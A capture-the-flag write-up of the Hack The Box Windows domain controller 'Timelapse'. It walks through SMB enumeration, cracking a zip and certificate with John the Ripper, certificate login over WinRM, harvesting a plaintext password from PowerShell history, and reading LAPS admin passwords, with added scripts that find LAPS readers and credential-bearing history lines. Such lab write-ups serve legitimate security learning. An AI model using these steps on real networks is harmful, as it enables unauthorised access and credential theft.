Writeup for the easy ranked HTB box Timelapse

Posted on Sep 13, 2022



First of all let’s see what Hack The Box stated in their announcement on Twitter.


Well not that many clues there. It’s a Windows machine and it’s supposed to be easy. Let’s see what other hackers reported about this box.


OK, it seems fairly realistic: there is a CVE that can be used, plus some custom exploitation. Let's spin it up and get ourselves a machine to attack.


That's it, we have a machine with an IP address. Let's get going.


Scanning network with Nmap

Let’s start by scanning the target for open ports.

└─# nmap -sC -sV -A
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-04 16:47 UTC
Nmap scan report for
Host is up (0.010s latency).
Not shown: 991 filtered tcp ports (no-response)
53/tcp  open  domain        Simple DNS Plus
88/tcp  open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-04-05 00:47:39Z)
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp open  microsoft-ds?
464/tcp open  kpasswd5?
593/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp open  ldapssl?
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h59m59s
| smb2-time:
|   date: 2022-04-05T00:48:02
|_  start_date: N/A
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required

TRACEROUTE (using port 80/tcp)
1   0.01 ms
2   1.47 ms

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 75.69 seconds

That's more or less the usual suspects for a Windows domain controller: DNS, Kerberos, LDAP, SMB and RPC, and the LDAP banner gives away the domain name timelapse.htb and the host name DC01. Nmap also reports a clock skew of almost 8 hours. Let's take a note of that: Kerberos only tolerates about five minutes of skew, so if we want to request tickets later we will have to sync our clock to the DC first. The first thing I like to do when approaching a Windows machine is to see if there are any shares I can access. Let's find out.

Scanning the machine for SMB shares

└─# smbclient -L timelapse.htb
Enter WORKGROUP\GUEST's password:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share
        Shares          Disk
        SYSVOL          Disk      Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to timelapse.htb failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

There is some stuff there, and it was listable with a blank guest password. The share called "Shares" stands out from the usual defaults. Let's check it out.

└─# smbclient //timelapse.htb/Shares
Enter WORKGROUP\GUEST's password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Oct 25 15:39:15 2021
  ..                                  D        0  Mon Oct 25 15:39:15 2021
  Dev                                 D        0  Mon Oct 25 19:40:06 2021
  HelpDesk                            D        0  Mon Oct 25 15:48:42 2021

                6367231 blocks of size 4096. 1146417 blocks available
smb: \> cd Dev
smb: \Dev\> ls
  .                                   D        0  Mon Oct 25 19:40:06 2021
  ..                                  D        0  Mon Oct 25 19:40:06 2021
  winrm_backup.zip                    A     2611  Mon Oct 25 15:46:42 2021

                6367231 blocks of size 4096. 1146417 blocks available
smb: \Dev\> get winrm_backup.zip
getting file \Dev\winrm_backup.zip of size 2611 as winrm_backup.zip (12.9 KiloBytes/sec) (average 12.9 KiloBytes/sec)

So on that share there is a folder called Dev with a zip file called winrm_backup.zip. WinRM sounds juicy! We have downloaded it, and before leaving let's check out the other folder, HelpDesk.

smb: \Dev\> cd ../HelpDesk\
smb: \HelpDesk\> ls
  .                                   D        0  Mon Oct 25 15:48:42 2021
  ..                                  D        0  Mon Oct 25 15:48:42 2021
  LAPS.x64.msi                        A  1118208  Mon Oct 25 14:57:50 2021
  LAPS_Datasheet.docx                 A   104422  Mon Oct 25 14:57:46 2021
  LAPS_OperationsGuide.docx           A   641378  Mon Oct 25 14:57:40 2021
  LAPS_TechnicalSpecification.docx      A    72683  Mon Oct 25 14:57:44 2021

                6367231 blocks of size 4096. 1146417 blocks available

OK, there are LAPS installer and documentation files lying around. LAPS (Local Administrator Password Solution) sets and rotates the local Administrator password and stores it in Active Directory, so its presence is a strong hint for the later privilege escalation. Let's take a note of that for later. We could go on to check the other shares, but the zip sounds more interesting, so let's look at that first.

Unpacking the zip file to examine its contents

Let’s unpack the zip file.

└─# unzip winrm_backup.zip
Archive:  winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password:

It is encrypted with a password. Let's try to crack it with John the Ripper and the rockyou wordlist. John cannot read the archive directly, so the first step is zip2john winrm_backup.zip > hash.txt, which writes the archive's encryption metadata in a form John can load; then we run the wordlist against it.

└─# john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 20 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
supremelegacy    (winrm_backup.zip/legacyy_dev_auth.pfx)
1g 0:00:00:00 DONE (2022-04-04 17:02) 5.263g/s 18324Kp/s 18324Kc/s 18324KC/s swimfan12..sunmoony
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

BOOM!!! That was quick. The password is supremelegacy. Time to unzip the archive.

└─# unzip winrm_backup.zip
Archive:  winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password:
  inflating: legacyy_dev_auth.pfx

Inside we find a single .pfx file. That is a PKCS#12 container: it holds a certificate (the public part) together with its private key, and the container itself is protected by a password. We can use openssl to extract the private key.

└─# openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out legacyy_dev_auth.key
Enter Import Password:

Once again we are met with a password request. Back to John the Ripper.

└─# pfx2john legacyy_dev_auth.pfx > hash.txt

└─# john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 256/256 AVX2 8x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 20 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
thuglegacy       (legacyy_dev_auth.pfx)
1g 0:00:00:09 DONE (2022-04-04 17:08) 0.1015g/s 328511p/s 328511c/s 328511C/s thuglife06..thomasfern
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

This one took just a little bit longer, but once again we were lucky in cracking the password. This one is "thuglegacy". Let's go back to openssl and extract the private key.

└─# openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out legacyy_dev_auth.key
Enter Import Password:
Enter PEM pass phrase:
Verifying - Enter PEM pass phrase:

└─# cat legacyy_dev_auth.key
Bag Attributes
    Microsoft Local Key set: <No Values>
    localKeyID: 01 00 00 00
    friendlyName: te-4a534157-c8f1-4724-8db6-ed12f25c2a9b
    Microsoft CSP Name: Microsoft Software Key Storage Provider
Key Attributes
    X509v3 Key Usage: 90

This time we are successful. Let's extract the public part as well.

└─# openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out legacyy_dev_auth.crt
Enter Import Password:

└─# cat legacyy_dev_auth.crt
Bag Attributes
    localKeyID: 01 00 00 00
subject=CN = Legacyy

issuer=CN = Legacyy


That's it. We have both the private key and the certificate. The certificate is self-signed (subject and issuer are both CN = Legacyy). That works for WinRM certificate authentication as long as the server trusts the issuer and has a certificate mapping for it; the certificate also needs the Client Authentication extended key usage and the user's UPN in its subject alternative name, both of which openssl x509 -text would show. Let's try to use them to connect to our target and gain access.

Gaining Access

We will try to connect to the server using good old evil-winrm. It is always tedious to get it working, so I tend to use the Docker image. First of all let's spawn a new PowerShell and copy the private key and certificate out of the Kali Docker container into a folder called data.

PS C:\Users\f1rstr3am\Downloads> mkdir data

    Directory: C:\Users\f1rstr3am\Downloads

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----          4/4/2022   7:30 PM                data

PS C:\Users\f1rstr3am\Downloads> docker cp 45a10cce9540:legacyy_dev_auth.key .\data\legacyy_dev_auth.key
PS C:\Users\f1rstr3am\Downloads> docker cp 45a10cce9540:legacyy_dev_auth.crt .\data\legacyy_dev_auth.crt

Now let's try to connect to the target using the dockerized evil-winrm. I chose to protect the private key with the same password as the original file, "thuglegacy", and I need to use that now. (openssl's -nodes option would have written the key unencrypted and skipped that prompt.)

PS C:\Users\f1rstr3am\Downloads> docker run --rm -ti --name evil-winrm -v  C:\Users\f1rstr3am\Downloads\data:/data oscarakaelvis/evil-winrm -i timelapse.htb -c /data/legacyy_dev_auth.crt -k /data/legacyy_dev_auth.key --ssl

Evil-WinRM shell v3.3

Warning: SSL enabled

Info: Establishing connection to remote endpoint

Enter PEM pass phrase:
*Evil-WinRM* PS C:\Users\legacyy\Documents>

Hell yes, we have a shell on our target. Let's see what we can find!!!

*Evil-WinRM* PS C:\Users\legacyy\Documents> cd ..
*Evil-WinRM* PS C:\Users\legacyy> cd Desktop
*Evil-WinRM* PS C:\Users\legacyy\Desktop> ls

    Directory: C:\Users\legacyy\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         4/4/2022   5:47 PM             34 user.txt

*Evil-WinRM* PS C:\Users\legacyy\Desktop> cat user.txt

YES! The first part of our mission is accomplished. Now let’s see where we can go from here.

Lateral movement

First of all let’s see what users there are in the system.

*Evil-WinRM* PS C:\Users\legacyy\Desktop> Get-ADUser -Filter *

DistinguishedName : CN=Administrator,CN=Users,DC=timelapse,DC=htb
Enabled           : True
GivenName         :
Name              : Administrator
ObjectClass       : user
ObjectGUID        : d81c9e60-4de1-454f-af28-47cc1a289429
SamAccountName    : Administrator
SID               : S-1-5-21-671920749-559770252-3318990721-500
Surname           :
UserPrincipalName :

DistinguishedName : CN=Guest,CN=Users,DC=timelapse,DC=htb
Enabled           : True
GivenName         :
Name              : Guest
ObjectClass       : user
ObjectGUID        : 4f76c58e-f859-43b3-9816-defe98754f7b
SamAccountName    : Guest
SID               : S-1-5-21-671920749-559770252-3318990721-501
Surname           :
UserPrincipalName :

DistinguishedName : CN=krbtgt,CN=Users,DC=timelapse,DC=htb
Enabled           : False
GivenName         :
Name              : krbtgt
ObjectClass       : user
ObjectGUID        : b5e1ba02-44e2-4e7d-9661-4329a01c26f1
SamAccountName    : krbtgt
SID               : S-1-5-21-671920749-559770252-3318990721-502
Surname           :
UserPrincipalName :

DistinguishedName : CN=TheCyberGeek,OU=Admins,OU=Staff,DC=timelapse,DC=htb
Enabled           : True
GivenName         : TheCyberGeek
Name              : TheCyberGeek
ObjectClass       : user
ObjectGUID        : 05aaa631-38f8-418c-99dc-02c0190728c9
SamAccountName    : thecybergeek
SID               : S-1-5-21-671920749-559770252-3318990721-1601
Surname           :
UserPrincipalName : [email protected]

DistinguishedName : CN=Payl0ad,OU=Admins,OU=Staff,DC=timelapse,DC=htb
Enabled           : True
GivenName         : Payl0ad
Name              : Payl0ad
ObjectClass       : user
ObjectGUID        : e205d5ca-3a9a-4348-a498-62512ccf0632
SamAccountName    : payl0ad
SID               : S-1-5-21-671920749-559770252-3318990721-1602
Surname           :
UserPrincipalName : [email protected]

DistinguishedName : CN=Legacyy,OU=Dev,OU=Staff,DC=timelapse,DC=htb
Enabled           : True
GivenName         : Legacyy
Name              : Legacyy
ObjectClass       : user
ObjectGUID        : c5f74830-1fe1-48ec-bc73-29091fa6cd81
SamAccountName    : legacyy
SID               : S-1-5-21-671920749-559770252-3318990721-1603
Surname           :
UserPrincipalName : [email protected]

DistinguishedName : CN=Sinfulz,OU=HelpDesk,OU=Staff,DC=timelapse,DC=htb
Enabled           : True
GivenName         : Sinfulz
Name              : Sinfulz
ObjectClass       : user
ObjectGUID        : 3c63ba91-1526-4c54-93c9-5802824dd2cf
SamAccountName    : sinfulz
SID               : S-1-5-21-671920749-559770252-3318990721-1604
Surname           :
UserPrincipalName : [email protected]

DistinguishedName : CN=Babywyrm,OU=HelpDesk,OU=Staff,DC=timelapse,DC=htb
Enabled           : True
GivenName         : Babywyrm
Name              : Babywyrm
ObjectClass       : user
ObjectGUID        : 11b9e998-4200-4cf8-bde2-7a359d865b46
SamAccountName    : babywyrm
SID               : S-1-5-21-671920749-559770252-3318990721-1605
Surname           :
UserPrincipalName : [email protected]

DistinguishedName : CN=svc_deploy,CN=Users,DC=timelapse,DC=htb
Enabled           : True
GivenName         : svc_deploy
Name              : svc_deploy
ObjectClass       : user
ObjectGUID        : 6c242c8e-8aa7-4110-8458-ee9d8d4096e0
SamAccountName    : svc_deploy
SID               : S-1-5-21-671920749-559770252-3318990721-3103
Surname           :
UserPrincipalName : [email protected]

DistinguishedName : CN=TRX,OU=Admins,OU=Staff,DC=timelapse,DC=htb
Enabled           : True
GivenName         : TRX
Name              : TRX
ObjectClass       : user
ObjectGUID        : 7f759230-0ed1-42fe-acc5-a930d35e3d9b
SamAccountName    : TRX
SID               : S-1-5-21-671920749-559770252-3318990721-5101
Surname           :
UserPrincipalName : [email protected]

OK, that's a bunch: three accounts in an Admins OU (TheCyberGeek, Payl0ad, TRX), two in HelpDesk, our own legacyy in Dev, and a service account called svc_deploy. I remember that LAPS was lying around. Let's start by checking if it's actually used.

*Evil-WinRM* PS C:\Users\legacyy\Documents> reg query "HKLM\Software\Policies\Microsoft Services\AdmPwd" /v AdmPwdEnabled

HKEY_LOCAL_MACHINE\Software\Policies\Microsoft Services\AdmPwd
    AdmPwdEnabled    REG_DWORD    0x1

That is the case: the LAPS client-side extension is enabled by policy on this host. LAPS sets a random password for the local Administrator account, rotates it on a schedule, and writes the current value in clear text to the ms-Mcs-AdmPwd attribute of the computer object in Active Directory. The attribute is marked confidential, so reading it requires an explicit extended right on the computer object (granted when LAPS permissions are set up) rather than plain read access; domain admins have it by default. Let's find out who has rights to read it.
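Rather than guessing, we can read the answer off the computer objects' DACLs. The function below is an added example, not part of the original writeup: it looks up the schema GUID of ms-Mcs-AdmPwd and lists every ACE that grants the extended right on that attribute (or all extended rights, or GenericAll) for each computer object. It assumes the ActiveDirectory module is available in the session, which it is on a domain controller such as DC01, and that the caller can read object DACLs, which any authenticated domain user normally can.

```powershell
# Added example (not from the original writeup): list who can read the LAPS
# password attribute (ms-Mcs-AdmPwd) on each computer object.
# Assumes: ActiveDirectory module present (DC or RSAT) and the caller can read
# the DACL of computer objects, which authenticated users normally can.
Import-Module ActiveDirectory

function Get-LapsReaders {
    [CmdletBinding()]
    param(
        # Limit the search to one OU; the default is the whole domain.
        [string]$SearchBase = (Get-ADDomain).DistinguishedName
    )

    # ms-Mcs-AdmPwd is a confidential attribute: reading it needs CONTROL_ACCESS
    # (ExtendedRight) on that attribute, or on all attributes (empty ObjectType).
    # Look the attribute's schemaIDGUID up instead of hard-coding it.
    $schemaNC = (Get-ADRootDSE).schemaNamingContext
    $attr = Get-ADObject -SearchBase $schemaNC `
                         -LDAPFilter '(lDAPDisplayName=ms-Mcs-AdmPwd)' `
                         -Properties schemaIDGUID
    if (-not $attr) {
        throw 'ms-Mcs-AdmPwd is not in the schema: LAPS is not installed in this domain.'
    }
    $admPwdGuid = [guid]$attr.schemaIDGUID

    foreach ($computer in Get-ADComputer -Filter * -SearchBase $SearchBase) {
        # Get-Acl on the AD: drive returns the effective DACL, inherited ACEs included.
        $acl = Get-Acl -Path ('AD:\' + $computer.DistinguishedName)
        $acl.Access |
            Where-Object {
                $_.AccessControlType -eq 'Allow' -and
                $_.ActiveDirectoryRights -match 'ExtendedRight|GenericAll' -and
                ($_.ObjectType -eq $admPwdGuid -or $_.ObjectType -eq [guid]::Empty)
            } |
            ForEach-Object {
                [pscustomobject]@{
                    Computer  = $computer.Name
                    Principal = $_.IdentityReference.Value
                    Rights    = $_.ActiveDirectoryRights
                    Inherited = $_.IsInherited
                }
            }
    }
}

# Usage: run inside the evil-winrm shell or a PSSession on the target.
Get-LapsReaders | Sort-Object Computer, Principal | Format-Table -AutoSize
```

The output mirrors what LAPS' own Find-AdmPwdExtendedRights cmdlet reports. The principals are usually groups, so the last step is to check their membership with Get-ADGroupMember -Recursive and see whether any account you already control (or can get to) is in one of them. Because the listing comes from the ACL rather than from trying to read the password, it works from a low-privileged account, which is exactly the position we are in right now.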

*Evil-WinRM* PS C:\Users\legacyy\Documents> Get-ADComputer -Filter * -Properties MS-Mcs-AdmPwd | Where-Object MS-Mcs-AdmPwd -ne $null | FT Name, MS-Mcs-AdmPwd

Our user cannot read it: the attribute comes back empty for every computer, which is what you get for a confidential attribute when the caller lacks the right. That is the same query Microsoft documents for reading LAPS passwords, so we need a user that has the right. There was a user called svc_deploy; I would go for that, but how? At this point I realised that Defender pretty much prevented me from uploading any of my usual recon tools to the target, so I started examining things by hand. This https://book.hacktricks.xyz/windows/windows-local-privilege-escalation and this https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html are good references when it comes to Windows privilege escalation. And after trying a bunch of things I found this:

*Evil-WinRM* PS C:\Users\legacyy> type AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -
SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *

Ooopsi daisy!!! The PowerShell history of legacyy contains a plaintext password for svc_deploy, typed straight into ConvertTo-SecureString -AsPlainText. We found our way to the svc_deploy user. Now I can exit evil-winrm, go back to my own machine and connect again as svc_deploy, reusing the lines from the history.
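Finding credentials in a PSReadLine history file is common enough that it is worth checking every profile on a host, not just the one you landed in. The function below is an added example, not from the original writeup: it walks C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt and flags lines that match a few credential patterns. The patterns are heuristics chosen for this example, and reading other users' profiles assumes you have the rights to do so (a low-privileged user will typically only see their own).

```powershell
# Added example (not from the original writeup): scan every profile's PSReadLine
# history for lines that look like they carry credentials.
# Assumes: read access to the profiles under $UsersRoot; patterns are heuristics.
function Find-HistorySecrets {
    [CmdletBinding()]
    param(
        [string]$UsersRoot = 'C:\Users'
    )

    # Each pattern names one way credentials commonly end up in shell history.
    $patterns = [ordered]@{
        'ConvertTo-SecureString -AsPlainText' = 'ConvertTo-SecureString\s+[''"].+?[''"]\s+-AsPlainText'
        'PSCredential constructor'            = 'PSCredential\s*\('
        'net use with password'               = 'net\s+use\b.*\s/user:\S+\s+\S+'
        'password-style argument'             = '(?i)(-p(ass(word)?)?|--password|/p)[\s:=]+\S+'
        'runas /savecred'                     = '(?i)runas\b.*/savecred'
    }

    # Build the list of history files that actually exist.
    $historyFiles = Get-ChildItem -Path $UsersRoot -Directory -ErrorAction SilentlyContinue |
        ForEach-Object {
            Join-Path $_.FullName 'AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt'
        } |
        Where-Object { Test-Path -LiteralPath $_ }

    foreach ($file in $historyFiles) {
        $lineNo = 0
        foreach ($line in Get-Content -LiteralPath $file -ErrorAction SilentlyContinue) {
            $lineNo++
            foreach ($name in $patterns.Keys) {
                if ($line -match $patterns[$name]) {
                    [pscustomobject]@{
                        File    = $file
                        Line    = $lineNo
                        Pattern = $name
                        Text    = $line.Trim()
                    }
                    break   # one hit per line is enough
                }
            }
        }
    }
}

# Usage: on this box the legacyy history would be reported twice, once for the
# ConvertTo-SecureString line and once for the PSCredential line.
Find-HistorySecrets | Format-Table -AutoSize -Wrap
```

Current PSReadLine releases skip commands containing strings such as password or asplaintext by default, but older ones record everything, and a history file survives across sessions until someone deletes it. On the defensive side, the same scan run as a scheduled job is a cheap way to catch the habit of pasting secrets into an interactive shell.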

PS C:\Users\f1rstr3am\Downloads> $so = New-PSSessionOption -SkipCACheck -SkipCNCheck
PS C:\Users\f1rstr3am\Downloads> $p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
PS C:\Users\f1rstr3am\Downloads> $c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
PS C:\Users\f1rstr3am\Downloads> Enter-PSSession -ComputerName timelapse.htb -Credential $c -port 5986 -UseSSL -SessionOption $so
[timelapse.htb]: PS C:\Users\svc_deploy\Documents>

Now let’s go for Administrator.

Privilege escalation to Administrator

I can try that audit command for LAPS again.

[timelapse.htb]: PS C:\Users\svc_deploy\Documents> Get-ADComputer -Filter * -Properties MS-Mcs-AdmPwd | Where-Object MS-Mcs-AdmPwd -ne $null | FT Name, MS-Mcs-AdmPwd

Name MS-Mcs-AdmPwd
---- -------------
DC01 F}-Cr98jerlGX289.#yJ99)1

BOOOM! We now have the Administrator password of DC01. Since DC01 is a domain controller, which has no separate local accounts, the account LAPS is rotating here is the built-in domain Administrator. Let's exit once again and connect remotely with those credentials.

PS C:\Users\f1rstr3am\Downloads> $so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
PS C:\Users\f1rstr3am\Downloads> $p = ConvertTo-SecureString 'F}-Cr98jerlGX289.#yJ99)1' -AsPlainText -Force
PS C:\Users\f1rstr3am\Downloads> $c = New-Object System.Management.Automation.PSCredential ('Administrator', $p)
PS C:\Users\f1rstr3am\Downloads> Enter-PSSession -ComputerName timelapse.htb -credential $c -port 5986 -usessl -SessionOption $so
[timelapse.htb]: PS C:\Users\Administrator\Documents> cd ..\Desktop\
[timelapse.htb]: PS C:\Users\Administrator\Desktop> dir
[timelapse.htb]: PS C:\Users\Administrator\Desktop>

And BOOM again, but... what? There's nothing there? The flag is not on the Administrator's desktop, so let's check the other users.

[timelapse.htb]: PS C:\Users\Administrator\Desktop> dir ..\..\TRX\Desktop\

    Directory: C:\Users\TRX\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         4/4/2022   5:47 PM             34 root.txt

[timelapse.htb]: PS C:\Users\Administrator\Desktop> cat ..\..\TRX\Desktop\root.txt

And there it is!!!!


I do think that this is a typical easy box. Very straightforward, and even if you are not familiar with the concepts beforehand they can easily be googled. I did use PowerShell on Windows to do some remoting, but my guess is that you could have used PowerShell under Linux to do the same thing or just used evil-winrm. But it was an easy match to do some copy and pasting from the history right into PowerShell. No need to make things any harder than they actually are.

I really liked this box. I learned some new things. Connecting to a Windows machine with evil-winrm using certificates was new for me. And I did like the fact that Windows Defender aggressively stopped me from using any of my usual tools. That's real life and that's what I want from a box! Good job by d4rkpayl0ad!!!

Until the next time, happy hacking!